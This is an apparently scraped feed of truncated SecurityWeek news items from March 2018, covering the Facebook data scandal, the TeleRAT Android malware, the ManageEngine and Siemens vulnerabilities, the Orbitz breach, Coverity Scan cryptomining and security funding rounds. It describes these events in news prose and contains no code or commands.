SecurityWeek.webp 2018-03-21 18:20:04 Growing Mistrust Threatens Facebook After Data Mining Scandal (lien direct) As Facebook reels from the scandal over hijacked personal data, a movement to quit the social network gathered momentum Wednesday, portending threats to one of the most powerful internet firms. In a sign of the mood, one of those calling it quits was a high-profile co-founder of the WhatsApp messaging service acquired by Facebook in 2014 for $19 billion. "It is time. #deletefacebook," Brian Acton said in a tweet, using the hashtag protesting the handling of the crisis by the world's biggest social network. The WhatsApp co-founder, who now works at the rival messaging application Signal, posted the comment amid a growing uproar over revelations that Facebook data was harvested by a British political consulting firm linked to Donald Trump's presidential campaign. "Delete and forget. It's time to care about privacy," he said. The huge social network also faces investigations on both sides of the Atlantic over its data practices, and a handful of lawsuits which could turn into class actions that may prove a costly distraction for Facebook. It remains to be seen whether the uproar would lead to any significant departures, but the topic was active on social media, including on Facebook itself. Donella Cohen, a Weather Channel product manager, posted on her Facebook page that she would be off the network by midnight. "The latest revelations are showing just how corrupt and detrimental to society this particular platform is," she wrote.  "I hope that a new social network emerges. One that isn't so greedy as to corrupt the political process in the name of the almighty dollar." - Fabric of internet - Yet analysts noted Facebook is unlikely to fade quickly because of how it is woven into the fabric of the internet, with "like" buttons on websites, comments sections for news articles and an ad network that delivers messages to those who are not Facebook members. 
The #deleteFacebook movement "is a social media feedback loop from the public -- we saw the same thing with #deleteUber," said Jennifer Grygiel, a communications professor at Syracuse University. "Sure, some people will delete Facebook, but to truly delete Facebook would mean that users would need to delete Facebook, Instagram, WhatsApp, and Messenger. This is not realistic for most people given how social media has been integrated into everyday life." Sandra Proske, head of communications for the Finla Guideline Uber
SecurityWeek.webp 2018-03-21 16:02:05 (Déjà vu) Android Trojan Leverages Telegram for Data Exfiltration (lien direct) A newly discovered Android Trojan is abusing Telegram's Bot API to communicate with the command and control (C&C) server and to exfiltrate data, Palo Alto Networks security researchers warn. Dubbed TeleRAT, the malware appears to be originating from and/or to be targeting individuals in Iran. The threat is similar to the previously observed IRRAT Trojan, which uses Telegram's bot API for C&C communication only. Still active in the wild, IRRAT masquerades as applications supposedly informing users on the number of views their Telegram profile received (something that Telegram doesn't actually allow for). After the app's first launch, the malware creates and populates a series of files on the phone's SD card, which it then sends to an upload server. The files contain contact information, a list of Google accounts registered on the phone, SMS history, a picture taken with the front-facing camera, and a picture taken with back-facing camera. The malicious app reports to a Telegram bot, hides its icon from the phone's app menu, and continues to run in the background, waiting for commands. TeleRAT, on the other hand, creates two files on the device, one containing various device information (including system bootloader version number, available memory, and number of processor cores), and another containing a Telegram channel and a list of commands, Palo Alto Net Guideline
SecurityWeek.webp 2018-03-21 15:57:00 Fraud Prevention Firm Sift Science Raises $53 Million (lien direct) Fraud prevention and risk management solutions provider Sift Science today announced that it has closed a $53 million Series D funding round, bringing the total raised to date by the company to $107 million. The latest funding round was led by New York-based growth equity firm Stripes Group, with participation from SPINS, Remitly, Flatiron Health, Udemy, GrubHub, and previous investors Union Square Ventures, Insight Venture Partners, and Spark Capital. Sift Science plans on using the newly acquired funds to expand its global footprint in the fraud detection and prevention market, which is estimated to reach roughly $42 billion by 2022. Sift's Digital Trust Platform relies on machine learning to protect businesses against fraud and abuse, including payment fraud, fake accounts, account hijacking, and abusive user-generated content. The platform uses data from thousands of websites and apps to identify fraud patterns based on connections between users, behaviors, locations, devices and more. Sift says its customers include Airbnb, Twitter, Twilio, Shutterstock, Yelp, Wayfair and Jet. “We believe Sift is uniquely positioned to leverage its best-in-class software platform and data network to fundamentally reshape the way businesses and consumers interact online – with more confidence, transparency and security. We are thrilled to be partnering with Sift as it accelerates its already exceptional growth trajectory,” said Ron Shah, partner at Stripes Group. 
Related: Virsec Raises $24 Million in Series B Funding Related: ThreatQuotient Raises $30 Million in Series C Funding Related: RELX Group to Acquire Fraud Fighting Firm ThreatMetrix for $815 Million
SecurityWeek.webp 2018-03-21 15:41:04 Webinar Today - Reducing Privileges Reduces Risk: Using the Least Privilege Model (lien direct) Reducing Privileges Reduces Risk: Using the Least Privilege Model Live Webinar - March 21, 2018 at 1PM ET Have you been exploring ways to implement a least privilege strategy to lower your risk of malware-based attack? Are you struggling to meet security compliance requirements, trying to lock down and remove unneeded and unmanaged privileged accounts? Worried that removing local admin privileges from users will backfire if they can't access the applications and tools they need? Removing local admin rights, including hidden and hard-coded credentials, mitigates virtually all critical vulnerabilities on Windows and Mac endpoints. But it's not enough to ensure your organization stays productive. Policy-based application control ensures business users can still access and manage the applications they need to do their job. Please join SecurityWeek and Thycotic for this webinar to learn the most effective way to discover, manage, secure and enforce local admin accounts. Register Now
SecurityWeek.webp 2018-03-21 15:02:04 (Déjà vu) Code Execution Flaws Found in ManageEngine Products (lien direct) Researchers at cybersecurity technology and services provider Digital Defense have identified another round of vulnerabilities affecting products from Zoho-owned ManageEngine. ManageEngine provides network, data center, desktop, mobile device, and security solutions to more than 40,000 customers, including three out of every five Fortune 500 companies. Earlier this year, Digital Defense reported finding several potentially serious flaws in ManageEngine's ServiceDesk Plus help desk software, and on Wednesday the company disclosed the details of six additional security holes found by its researchers in ManageEngine Log360, EventLog Analyzer, and Applications Manager products. The vulnerabilities have been described by Digital Defense as file upload, blind SQL injection, local file inclusion, and API key disclosure issues that can be exploited without authentication for arbitrary code execution and obtaining potentially sensitive information. According to the security firm, the Log360 and EventLog Analyzer log management products are affected by an unauthenticated file upload vulnerability that can be exploited to upload a JavaServer Pages (JSP) web shell to the root directory. This is possible due to the fact that a file upload feature's security checks can be easily bypassed. The rest of the flaws discovered by Digital Defense researchers impact ManageEngine Applications Manager and many of them can be exploited for arbitrary code execution. Experts have identified several blind SQL injection flaws that can be leveraged by unauthenticated attackers to execute arbitrary code with SYSTEM privileges and gain complete control of the targeted host. The list of security holes also includes a local file inclusion issue that can be exploited to download files that may contain sensitive information.
Researchers also discovered that an attacker can obtain an Applications Manager user's API key by sending a specially crafted GET request. “Depending on the privilege level of the compromised user, this could result in full compromise of both the Applications Manager web application and the host running it,” Digital Defense warned. The vulnerabilities were reported to ManageEngine on February 12 and fixes were developed a few weeks later. Patches were made available to customers on March 7. Related: Serious Flaws Affect Dell EMC, VMware Data Protection Products Re
SecurityWeek.webp 2018-03-21 14:52:00 18.5 Million Websites Infected With Malware at Any Time (lien direct) There are more than 1.86 billion websites on the internet. Around 1% of these -- something like 18,500,000 -- are infected with malware at a given time each week; while the average website is attacked 44 times every day. Sitelock has published its Q4 2017 Website Security Insider analysis of malware and websites based on statistics from 6 million of its 12 million customers. All these customers use at least one of Sitelock's malware scanners, while a smaller subset also use the firm's cloud-based web application firewall (WAF). The WAF provides insight into DDoS attacks against websites, while the scanners provide insight into the state of malware in websites. The analysis shows an increase of around 20% in the number of infected websites over Q3 2017. "We went from about 0.8% of our user base in Q3 to a little over 1% in Q4," Sitelock research analyst Jessica Ortega told SecurityWeek. A 0.2% increase seems a small number, but it implies that up to 18.5 million websites worldwide may be infected with malware at any given time. Despite the increase in infected sites, continued Ortega, "The total number of attacks or attempted attacks actually decreased by about 20% -- so what we're seeing is that it takes fewer attack attempts to compromise the websites. Attackers are becoming sneakier, and more difficult-to-decode malware is coming through." The majority of Sitelock's customers are typically small businesses and blogs. "Many website owners remain unaware that website security is their responsibility and rely too heavily on popular search engines and other third parties to notify them when they've been compromised," said Ortega. This doesn't work -- less than 1 in 5 infected websites are blacklisted by the search engines. Other owners rely on their CMS software provider to keep them secure with security updates.
But according to Sitelock, 46% of WordPress sites infected with malware were up to date with the latest core updates. Those also using plug-ins were twice as likely to be compromised.  It is the sheer volume of both threats and compromises that is most surprising. During Q4 2017, Sitelock cleaned an average of 672,655 malicious files every week. It found an average of 309 infected files per site. Sixteen percent of malware results in site defacements, while more than 12% are backdoors facilitating the upload of thousands of other malicious files including exploit kits and phishing pages. Jessica Ortega, research analyst at Sitelock, comments that the malicious files are often stored on websites in zip files. Even if active files are removed, the site can be compromised again, and the zip file extracted for the attacker to continue precisely as before. One of the problems is that the average website is very easy to compromise. Sitelock's analysis in Q4 found an average of 414 pages per site containing cross-site scripting (XSS) vulnerabilities; 959 pages per site containing SQL injection (SQLi) vulnerabilities; and 414 pages per site containing cross-site request forgery (CSRF) vulnerabilities. 
SecurityWeek.webp 2018-03-21 12:33:01 Siemens Patches Flaws in SIMATIC Controllers, Mobile Apps (lien direct) German industrial giant Siemens has released security patches for several of its SIMATIC products, including some controllers and a mobile application. Organizations using SIMATIC products were informed by both Siemens and ICS-CERT this week of a denial-of-service (DoS) vulnerability that can be exploited by sending specially crafted PROFINET DCP packets to affected systems. The flaw, tracked as CVE-2018-4843 and classified as medium severity, can be exploited by an attacker who has access to the network housing the targeted device. While DoS vulnerabilities are generally seen as less severe compared to code execution and other types of flaws, in the case of industrial control systems (ICS), they can have serious impact. The security hole affects several SIMATIC central processing units (CPUs) and software controllers, SINUMERIK CNC automation solutions, and Softnet PROFINET IO controllers. Siemens has released patches for some of the impacted systems, and provided workarounds and mitigations for the rest. Siemens also informed customers on Tuesday of an access control vulnerability affecting the Android and iOS versions of its SIMATIC WinCC OA UI mobile application. This app is designed to allow users to remotely access WinCC OA facilities from their mobile devices. “The latest update for the Android app and iOS app SIMATIC WinCC OA UI fix a security vulnerability which could allow read and write access from one HMI project cache folder to other HMI project cache folders within the app's sandbox on the same mobile device,” Siemens wrote in its advisory. “This includes HMI project cache folders of other configured WinCC OA servers. Precondition for this scenario is that an attacker tricks an app user to connect to an attacker-controlled WinCC OA server,” it added.
The SIMATIC WinCC OA UI application vulnerability was discovered by experts at IOActive and Embedi as part of their research into SCADA mobile apps. They analyzed applications from 34 vendors and found security holes in a vast majority of them. Related: Schneider Electric Patches Several Flaws in IGSS Products Related: Siemens Releases BIO
SecurityWeek.webp 2018-03-21 11:29:00 (Déjà vu) 5 Fun Facts About the 2018 Singapore Cybersecurity Statute (lien direct) An orchard of cybersecurity law is growing in Asia. Now based in Singapore, your intrepid reporter is bumping into these cyber laws not as a participant (yet) but as an interested observer. Like the data-protection laws recently passed throughout the region, these cybersecurity regulations have a lot in common with each other.  Singaporeans are known for their discipline, so you can expect that their cybersecurity law will be among the best in the region.  Let your intrepid reporter summarize the statute, and also highlight 5 fun facts found within it. The Singapore Cybersecurity Statute On January 8, 2018, the Singapore government published Bill No. 2/2018, referred to as “the Cybersecurity Bill.” Local infosec professionals consider it, overall, a good bill, covering exactly the topics one would expect to see from the Singaporean government. After a first draft, lively debate ensued during the public commentary period, and the government folded the best suggestions into its final bill. The administration of the statute will be completed by a Cybersecurity Commissioner. This person will define many of the finer points of policy, which have been purposely left out of the framework.  The bill comprises three main themes: 1. Critical Infrastructure. The Cybersecurity Bill defines the criteria by which the commissioner should identify critical infrastructure (sections 7–9). These include 11 groupings of “essential services,” including aviation, banking, and healthcare. Fun Fact #1: The Philippine government is working on a similar project, called the “National Cybersecurity Plan 2022”, and word is that they copied the groupings, in order, from the Singaporean version. Nothing wrong with that, though. The local cybersecurity community applauds the Singapore bill's requirements for bi-annual audits and regular penetration tests. 
That's just good policy, so it might as well be a law; after all, this is Singapore. 2. Incident Response. Sections 19–23 define the powers the commissioner has to investigate, prevent, and respond to cybersecurity incidents. Fun Fact #2: Of interest is that the bill allows the designation of temporary technical experts, who will be issued cards identifying themselves as such. Your reporter personally finds this pretty cool, and would be tickled to be a card-carrying Singaporean crime fighter (temporarily) someday. He imagines himself holding up a badge and saying, with authority, “Everyone calm down, I'm here to help.” 3. Cybersecurity Service Providers. Sections 24–35 describe the governance of so-called cybersecurity service providers, that is, penetration testers and security operations centers (SOCs). Perhaps the most significant aspect of the bill is Fun Fact #3: Provid Cloud APT 37
SecurityWeek.webp 2018-03-21 07:22:02 (Déjà vu) \'Slingshot\' Is U.S. Government Operation Targeting Terrorists: Report (lien direct) The Slingshot cyber espionage campaign exposed recently by Kaspersky Lab is a U.S. government operation targeting members of terrorist organizations, according to a media report. Earlier this month, Kaspersky published a report detailing the activities of a threat actor targeting entities in the Middle East and Africa - sometimes by hacking into their Mikrotik routers. The group is believed to have been active since at least 2012 and its members appear to speak English, the security firm said. The main piece of malware used by the group has been dubbed Slingshot based on internal strings found by researchers. Kaspersky identified roughly 100 individuals and organizations targeted with the Slingshot malware, mainly in Kenya and Yemen, but also in Afghanistan, Libya, Congo, Jordan, Turkey, Iraq, Sudan, Somalia and Tanzania. CyberScoop claims to have learned from unnamed current and former U.S. intelligence officials that Slingshot is actually an operation of the U.S. military's Joint Special Operations Command (JSOC), a component of Special Operations Command (SOCOM), aimed at members of terrorist organizations such as ISIS and al-Qaeda. SOCOM is well known for its counterterrorism operations, which can sometimes include a cyber component. CyberScoop's sources expressed concern that the exposure of the campaign may result in the U.S. losing a valuable surveillance program and it could even put the lives of soldiers at risk. The Slingshot infrastructure was likely already abandoned and “burned” following the disclosure, one former intelligence official told the publication. Kaspersky has always insisted that its role is to protect customers against cyber threats, regardless of the source of an attack. 
The company typically refrains from attributing attacks, but it has exposed operations believed to be linked to Russia, China, the United States and others. In the case of Slingshot, Kaspersky has not directly attributed the campaign to the United States, but it did note that the hackers appear to speak English. The company also pointed out that some of the techniques used by this actor are similar to ones leveraged by a group known as Longhorn and The Lamberts, which is believed to be associated with the U.S. Central Intelligence Agency (CIA). It's also worth noting that the WikiLeaks Vault7 files, which are believed to be tools developed and used by the CIA, describe a Mikrotik router exploit, although it is unclear if it's the one used in Slingshot attacks. Another clue that shows a potential connection between Slingshot and U.S. intelligence is the use of tools and code strings referencing “Lord of the Rings” characters, including Gollum, which is also the name of an implant referenced in NSA documents
SecurityWeek.webp 2018-03-21 02:30:00 U.S. Military Should Step Up Cyber Ops: General (lien direct) Washington - US efforts to conduct offensive and defensive operations in cyberspace are falling short, a top general warned Tuesday amid ongoing revelations about Russian hacking. General John Hyten, who leads US Strategic Command (STRATCOM), told lawmakers the US has "not gone nearly far enough" in the cyber domain, also noting that the military still lacks clear rules of cyber engagement. "We have to go much further in treating cyberspace as an operational domain," Hyten told the Senate Armed Services Committee. "Cyberspace needs to be looked at as a warfighting domain, and if somebody threatens us in cyberspace we need to have the authorities to respond." Hyten noted, however, that the US had made some progress in conducting cyber attacks on enemies in the Middle East, such as the Islamic State group. His testimony comes weeks after General Curtis Scaparrotti, commander of NATO forces in Europe, warned that US government agencies are not coordinating efforts to counter the cyber threat from Russia, even as Moscow conducts a "campaign of destabilization." And last month, Admiral Michael Rogers, who heads both the NSA -- the leading US electronic eavesdropping agency -- and the new US Cyber Command, said President Donald Trump had not yet ordered his spy chiefs to retaliate against Russian interference in US elections. The US has accused Russia of actively interfering in the 2016 presidential election, stealing Democratic party communications and pushing out disinformation through social media. It also accuses Moscow of stealing hacking secrets of the US intelligence community -- while US cyber security investigators have accused the Russian government of a sustained effort to take control of critical US infrastructure systems including the energy grid. 
Hyten added that the military needs clear authorities and rules of engagement so operators know when and how to respond to attacks. "We need to have specific rules of engagement in cyber that match the other domains that we operate in," Hyten said. "We need to delegate that authority all the way down so we can deal with threats that exist that challenge the United States." Guideline
SecurityWeek.webp 2018-03-21 01:24:01 (Déjà vu) AMD Says Patches Coming Soon for Chip Vulnerabilities (lien direct) AMD Chip Vulnerabilities to be Addressed Through BIOS Updates - No Performance Impact Expected After investigating recent claims from a security firm that its processors are affected by more than a dozen serious vulnerabilities, chipmaker Advanced Micro Devices (AMD) on Tuesday said patches are coming to address several security flaws in its chips. In its first public update after the surprise disclosure of the vulnerabilities by Israel-based security firm CTS Labs, AMD said the issues are associated with the firmware managing the embedded security control processor in some of its products (AMD Secure Processor) and the chipset used in some socket AM4 and socket TR4 desktop platforms supporting AMD processors. CTS Labs, which was unheard of until last week, came under fire shortly after its disclosure for giving AMD only 24 hours' notice before going public with its findings, and for apparently attempting to short AMD stock. The company later made some clarifications regarding the flaws and its disclosure method. CTS Labs claimed that a number of vulnerabilities could be exploited for arbitrary code execution, bypassing security features, stealing data, helping malware become resilient against security products, and damaging hardware. “AMD has rapidly completed its assessment and is in the process of developing and staging the deployment of mitigations,” the chipmaker wrote in an update on Tuesday. 
“It's important to note that all the issues raised in the research require administrative access to the system, a type of access that effectively grants the user unrestricted access to the system and the right to delete, create or modify any of the folders or files on the computer, as well as change any settings.” AMD said that patches will be released through BIOS updates to address the flaws, which have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA. The company said that no performance impact is expected for any of the forthcoming mitigations. AMD attempte Guideline Equifax
SecurityWeek.webp 2018-03-20 20:26:04 Virsec Raises $24 Million in Series B Funding (lien direct) Virsec, a cybersecurity company that protects applications from various attacks, today announced that it has closed a $24 million Series B funding round led by tech investment firm BlueIO. This latest funding round brings the total amount raised to date by the company to $32 million. The company previously raised $1 million in seed funding and $7 million in a Series A funding round. Virsec explains that its technology can protect applications by protecting processes in memory and pinpointing attacks in real time, within any application. In more detail, the company explains that its Trusted Execution technology “maps acceptable application execution, and instantly detects deviations caused by attacks.” “The battleground has shifted in cybersecurity and the industry is not keeping up,” said Atiq Raza, CEO of San Jose, California-based Virsec. “With our deep understanding of process memory, control flow, and application context, we have developed a revolutionary solution that stops attacks in their tracks, where businesses are most vulnerable – within applications and processes.” Additional investors participating in the round include Artiman Ventures, Amity Ventures, Raj Singh, and Boston Seed Capital. Guideline Equifax
SecurityWeek.webp 2018-03-20 18:27:03 Online Sandbox Services Used to Exfiltrate Data: Researcher (lien direct) Attackers can use online sandbox services to exfiltrate data from an isolated network, a SafeBreach security researcher has discovered. The new research is based on the discovery that cloud anti-virus programs can be exploited for data pilfering. Last year, SafeBreach Labs' Itzik Kotler and Amit Klein demonstrated proof-of-concept (PoC) malware abusing this exfiltration method, and said it would work even on endpoints that have no direct Internet connection. The technique, the researchers revealed, relied on packing data inside an executable created by the main malware process on the compromised endpoint. Thus, if the anti-virus program on the endpoint uploads the executable to the cloud for further inspection, data is exfiltrated even if the file is executed in an Internet-connected sandbox. Now, SafeBreach security researcher Dor Azouri says that online sandbox services can be used for the same purposes and in similar circumstances. However, the researcher notes in a report (PDF
SecurityWeek.webp 2018-03-20 17:20:00 Orbitz Data Breach Impacts 880,000 Payment Cards (lien direct) Expedia-owned travel website Orbitz announced on Tuesday that it has discovered and addressed a data security incident affecting hundreds of thousands of users. In a statement provided to SecurityWeek and other news websites, Orbitz revealed that malicious actors apparently gained access to a legacy platform between October 1 and December 22, 2017. The attackers may have stolen personal and financial data from this platform, which stored both consumer and business partner information. The breach was discovered on March 1 following an investigation conducted by Orbitz. The company said it contracted forensic investigators and other cybersecurity experts to help it analyze the incident and eliminate vulnerabilities. Law enforcement has also been notified. Orbitz has highlighted that the hackers targeted a legacy platform and there is no evidence that the current Orbitz.com website is affected. The investigation showed that the attackers may have accessed personal information submitted by consumers who made certain purchases between January 1 and June 22, 2016. Information on Orbitz partners who made purchases between January 1, 2016 and December 22, 2017 may have also been stolen. The exposed information includes full name, gender, date of birth, phone number, email address, physical and billing address, and payment card data. The company said the breach impacted roughly 880,000 payment cards. There is no evidence that passport and travel itinerary information has been compromised, and Orbitz does not store social security numbers (SSNs) for customers in the United States. “We are working quickly to notify impacted customers and partners. We are offering affected individuals one year of complimentary credit monitoring and identity protection service in countries where available. 
Additionally, we are providing partners with complimentary customer notice support for partners to inform their customers, if necessary,” Orbitz stated. “Anyone who is notified is encouraged to carefully review and monitor their payment card account statements and contact their financial institution or call the number on the back of their card if they suspect that their payment card may have been misused,” the company added. Potentially impacted customers can obtain more information by calling 1-855-828-3959 (toll-free in the U.S.) or 1-512-201-2214 (international), or by visiting orbitz.allclearid.com. Orbitz.com is used by millions of people to search for and book hotels, flights, cruises, cars and other vacation-related activities. The company was acquired by Expedia in 2015 for $1.6 billion. Related: Travel
SecurityWeek.webp 2018-03-20 16:06:00 The Security Spending Paradox (lien direct) A Zero Trust Security Model Allows Organizations to Align Their Security Investments With What Works Best In a few weeks, security professionals from all around the world will descend on San Francisco for RSA Conference 2018 to discuss new approaches to information security and how to prevent being victimized by cyber-attacks. As always, the expo halls will be filled with the latest technologies, ranging from Artificial Intelligence, Container Security, Threat Intelligence, and Threat Hunting to Next-Gen Endpoint Security. But are these emerging technologies providing the effectiveness that is needed to defend against today's dynamic cyber threats? According to Gartner, worldwide security spending will reach $96 billion in 2018, up 8% from the 2017 spend of $89 billion. This statistic confirms that organizations are incorporating emerging technologies into their existing security stack to minimize their cyber risk exposure. Meanwhile, we're experiencing a continuous increase in security incidents. Are these security investments paying dividends? The security spending paradox is reflected in several recent research studies. For example, a Dow Jones Customer Intelligence study finds that 62 percent of CEOs believe malware is the biggest threat to their organization. In another report, the 2018 Scalar Security Study, respondents rate Network Security (61%) and Traditional Endpoint Protection (49%) as having higher (perceived) effectiveness than identity assurance and access controls (18%). Similar results were published by 451 Research in the 2018 Thales Data Threat Report, where network security (83%) and endpoint security (70%) scored highest in perceived effectiveness. These incongruent findings illustrate a lack of consensus in the industry on which attack vectors pose the biggest risk to organizations and the “identity crisis” in security. 
Many organizations don't realize the impact that identity and access management has when it comes to minimizing the risk of suffering a data breach. A post-mortem analysis of the top data breaches in 2017 reveals that compromised identity was the primary vector in these cyber-attacks. As a matter of fact, a whopping 81% of hacking-related breaches leverage either stolen, default, or weak passwords. In this context, organizations need to recognize that perimeter-based security, which focuses on securing endpoints and networks, provides no protection against identity and credential-based threats. Until we start implementing identity-centric security measures, account compromise attacks will continue to provide a perfect camouflage for data breaches. Guideline
SecurityWeek.webp 2018-03-20 15:48:01 Apple Addresses HSTS User Tracking in WebKit (lien direct) Apple has added new protections to the WebKit framework to prevent possible abuse of the HTTP Strict Transport Security (HSTS) security standard to track users. HSTS offers a mechanism through which web sites declare themselves accessible only via secure connections and direct browsers to where that secure version resides. Basically, when a user attempts to connect to the insecure version of a website, HSTS forces the browser to go to the HTTPS version of the site instead. “This is a great feature that prevents a simple error from placing users in a dangerous state, such as performing financial transactions over an unauthenticated connection,” WebKit software engineer Brent Fulgham points out. However, because HSTS tells web browsers to remember when redirected to a secure location and to automatically go there in the future, a “super cookie” can be created, and it can be read by cross-site trackers, Fulgham says. An attacker could leverage the user's HSTS cache to store one bit of information on the device. Through registering a lar
SecurityWeek.webp 2018-03-20 14:58:04 (Déjà vu) XM Cyber Unveils Automated Purple-Teaming at Speed and Scale (lien direct) Israeli Cybersecurity Startup Launches Automated Advanced Persistent Threat (APT) Simulation Platform Penetration testing is the most effective method of testing whether existing security policy stands up against advanced attackers, but it doesn't scale well to large, dynamic networks, and only provides a single conclusion at a specific point in time. The solution is clearly automation. XM Cyber is an Israeli firm founded in 2016. Its three co-founders are Tamir Pardo (formerly head of Mossad); Boaz Gorodissky (formerly head of technology for the government of Israel); and Noam Erez (who spent 25 years in Israeli intelligence). Its headquarters are in Israel, but with a presence in the U.S. and Australia. It has customers in Israel, the U.S. and Europe. Its primary product, an automated APT simulation platform called HaXM, is unveiled today. The product simulates the possible behavior of an attacker in order to locate potential weaknesses on the system; and then, using the data gathered, provides recommendations for the remediation of those weaknesses. In this manner it provides automated red teaming with blue teaming to produce purple teaming at speed, continuously, and at scale. "The problem we solve," VP of Product Adi Ashkenazy told SecurityWeek, "is that when you look at modern organizations and you see the kind of security stack they have in place, you have to wonder if they are actually securing their critical assets. This is something the companies ask themselves as well. They spend a lot of money on different products and vendors; but at the end of the day, if you ask them, 'are your critical assets secure?', they may have hope and some belief, but they have no concrete evidence to support the idea." 
Manual penetration testing to prove the hypothesis of security, he continued, makes no sense for the modern organization that may have tens of thousands of endpoints, and hundreds of subsystems; and is continuously evolving and changing. "This is why we founded XM Cyber," commented Noam Erez: "to equip enterprises with a continuous 360-degree view of which critical assets are at risk, what security issues they should focus on, and how best to harness their resources to resolve them." HaXM places sensors only on 'endpoints of interest'. "We don't have to map the entire network," said Ashkenazy. "We deploy our sensors on the endpoints of interest within the infrastructure that hackers are able or likely to use. We try to be almost religious in the way we mimic attacks -- we don't put sensors on every endpoint."
SecurityWeek.webp 2018-03-20 14:06:00 (Déjà vu) Oil and Gas Sector in Middle East Hit by Serious Security Incidents (lien direct) Many oil and gas companies in the Middle East reported suffering at least one serious security incident in the past year, according to a study conducted by Ponemon Institute on behalf of German industrial giant Siemens. Nearly 200 individuals responsible for overseeing cybersecurity risk in oil and gas companies in the Middle East took part in the study, and the results show that many organizations are unprepared to address the risks faced by their operational technology (OT) networks. According to Siemens, three-quarters of respondents said their organizations had suffered at least one security incident that resulted in disruption to operations in their OT environment or loss of confidential information in the past 12 months. Eleven percent of respondents said they had experienced more than 10 OT network intrusions, and nearly half believe they may not be aware of all breaches. Roughly two-thirds of the individuals who took part in the survey believe the risk of attacks on industrial control systems (ICS) has increased considerably over the past few years, and 60 percent say there is a greater risk to OT environments compared to IT. Outdated and ageing control systems pose a serious risk, according to 42 percent of respondents. The areas most at risk in Middle Eastern oil and gas companies are believed to be exploratory information, production information, potential partners, financial and organizational reports, operational data, information on drilling sites, and field production data collected by sensors. While insider threats are the main concern, only 21 percent of respondents are concerned about malicious insiders, while 68 percent are more worried about the cybersecurity impact of careless employees. 
Companies appear aware of the risks, but many of them are not prepared to deal with them. Less than half of respondents say they continually monitor their entire infrastructure, and only a quarter are confident in their ability to address security risks and allocate the resources necessary for addressing them. On average, companies have allocated only a third of their cybersecurity budget to protecting OT environments, the report shows. Siemens says many organizations are still attempting to air gap their ICS environments in an effort to mitigate threats, but only 39 percent plan on hardening endpoints, and 20 percent plan on adopting analytics solutions over the next year.
SecurityWeek.webp 2018-03-20 12:05:00 Telegram Must Give FSB Encryption Keys: Russian Court (lien direct) Moscow - Russia's Supreme Court on Tuesday ruled the popular Telegram messenger app must provide the country's security services with encryption keys to read users' messaging data, agencies reported. Media watchdog Roskomnadzor instructed Telegram to "provide the FSB with the necessary information to decode electronic messages received, transmitted, or being sent" within 15 days, it said on its website. Telegram had appealed against an earlier ruling that it must share this information, but this appeal was rejected on Tuesday. If it does not provide the keys it could be blocked in Russia. The free instant messaging app, which lets people exchange messages, photos and videos in groups of up to 5,000 people, has attracted more than 100 million users since its launch in 2013. Telegram's self-exiled Russian founder Pavel Durov said in September 2017 the FSB had demanded backdoor access. When Telegram did not provide the encryption keys, the FSB launched a formal complaint. Durov wrote last year that the FSB's demands are "technically impossible to carry out" and violate the Russian Constitution which entitles citizens to privacy of correspondence. Tuesday's ruling is the latest move in a dispute between Telegram and the Russian authorities as Moscow pushes to increase surveillance of internet activities. Last June, Russia's state communications watchdog threatened to ban the app for failing to provide registration documents. Although Telegram later registered, it stopped short of agreeing to its data storage demands. Companies on the register must provide the FSB with information on user interactions. From this year they must also store all the data of Russian users inside the country, according to controversial anti-terror legislation passed in 2016 which was decried by internet companies and the opposition. 
Related: Russia Fines Telegram For Not Giving Backdoor Access Related: Zero-Day in Telegram's Windows Client Exploited for Months
SecurityWeek.webp 2018-03-20 07:03:01 Coverity Scan Hacked, Abused for Cryptocurrency Mining (lien direct) Coverity Scan, a free service used by tens of thousands of developers to find and fix bugs in their open source projects, was suspended in February after hackers breached some of its servers and abused them for cryptocurrency mining. Synopsys, which acquired Coverity in 2014, started notifying Coverity Scan users about the breach on Friday. The company said malicious actors gained access to Coverity Scan systems sometime in February. “We suspect that the access was to utilize our computing power for cryptocurrency mining,” Synopsys told users. “We have not found evidence that database files or artifacts uploaded by the open source community users of the Coverity Scan service were accessed. We retained a well-known computer forensics company to assist us in our investigation.” Synopsys says the service is now back online and it believes the point of access leveraged by the attackers has been closed. In order to regain access to Coverity Scan, users will need to reset their passwords. “Please note that the servers in question were not connected to any other Synopsys computer networks. This should have no impact on customers of our commercial products, and this event did not put any Synopsys corporate data or intellectual property at risk,” users were told. Cybercriminals have become increasingly interested in making a profit by hacking PCs and servers and abusing them to mine cryptocurrencies. Cryptocurrency mining malware can target a wide range of devices, including industrial systems. One recent high-profile victim was the carmaker Tesla, whose Kubernetes pods were compromised and used for cryptocurrency mining. According to RedLock, which discovered the breach, hackers gained access to Tesla's Kubernetes console due to the lack of password protection. 
Related: Avoid Becoming a Crypto-Mining Bot - Where to Look for Mining Malware and How to Respond Related: Linux Malware Targets Raspberry Pi for Cryptocurrency Mining Uber Tesla
SecurityWeek.webp 2018-03-20 00:34:03 Facebook Security Chief Changes Role to Focus on Election Fraud (lien direct) Facebook's chief of security late Monday said his role has shifted to focusing on emerging risks and election security at the global social network, which is under fire for letting its platform be used to spread bogus news and manipulate voters. Alex Stamos revealed the change in his role at work after a New York Times report that he was leaving Facebook in the wake of internal clashes over how to deal with the platform being used to spread misinformation. "Despite the rumors, I'm still fully engaged with my work at Facebook," Stamos said in a message posted at his verified Twitter account. "It's true that my role did change. I'm currently spending more time exploring emerging security risks and working on election security." Stamos advocated investigating and revealing manipulation of news at the social network by Russian entities, to the chagrin of chief operating officer Sheryl Sandberg and other top executives, the Times reported, citing unnamed current and former employees. Stamos reportedly decided in December he was done with Facebook, but remained at the social network as part of a plan to smoothly hand his job off to a successor. Neither Facebook nor Stamos directly commented on how long he intended to remain at the company, referring to his tweet in response to queries. Word from Stamos came as the California-based social media giant faced an onslaught of criticism at home and abroad over revelations that a firm working for Donald Trump's presidential campaign harvested and misused data on 50 million members. Calls for investigations came on both sides of the Atlantic after Facebook responded to the explosive reports of misuse of its data by suspending the account of Cambridge Analytica, a British firm hired by Trump's 2016 campaign. 
Vera Jourova, the European commissioner for justice, consumers and gender equality, called the revelations "horrifying, if confirmed," and vowed to address concerns in the United States this week. In Britain, parliamentary committee chair Damian Collins said both Cambridge Analytica and Facebook had questions to answer. According to a joint investigation by the Times and Britain's Observer, Cambridge Analytica was able to create psychological profiles on 50 million Facebook users through a personality prediction app downloaded by 270,000 people, but also scooped up data from friends. A Cambridge Analytica statement denied misusing Facebook data for the Trump campaign. Facebook said Yahoo
